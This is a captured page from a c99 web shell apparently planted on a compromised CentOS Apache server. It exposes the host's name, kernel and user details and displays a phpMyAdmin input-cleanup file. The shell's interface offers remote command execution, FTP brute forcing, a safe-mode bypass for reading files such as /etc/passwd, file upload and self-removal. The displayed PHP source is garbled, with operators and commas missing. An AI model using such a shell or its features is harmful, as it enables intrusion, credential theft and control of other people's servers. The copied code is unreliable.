!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/libraries/   drwxr-xr-x
Free 40.47 GB of 127.8 GB (31.67%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     cleanup.lib.php (1.34 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/* vim: set expandtab sw=4 ts=4 sts=4: */
/**
 * Functions for cleanup of user input.
 *
 * @package phpMyAdmin
 */

/**
 * Removes all variables from request except whitelisted ones.
 *
 * @param string list of variables to allow
 * @return nothing
 * @access public
 */
function PMA_remove_request_vars(&$whitelist)
{
    
// do not check only $_REQUEST because it could have been overwritten
    // and use type casting because the variables could have become
    // strings
    
$keys array_keys(array_merge((array)$_REQUEST, (array)$_GET, (array)$_POST, (array)$_COOKIE));

    foreach(
$keys as $key) {
        if (! 
in_array($key$whitelist)) {
            unset(
$_REQUEST[$key], $_GET[$key], $_POST[$key], $GLOBALS[$key]);
        } else {
            
// allowed stuff could be compromised so escape it
            // we require it to be a string
            
if (isset($_REQUEST[$key]) && ! is_string($_REQUEST[$key])) {
                unset(
$_REQUEST[$key]);
            }
            if (isset(
$_POST[$key]) && ! is_string($_POST[$key])) {
                unset(
$_POST[$key]);
            }
            if (isset(
$_COOKIE[$key]) && ! is_string($_COOKIE[$key])) {
                unset(
$_COOKIE[$key]);
            }
            if (isset(
$_GET[$key]) && ! is_string($_GET[$key])) {
                unset(
$_GET[$key]);
            }
        }
    }
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0089 ]--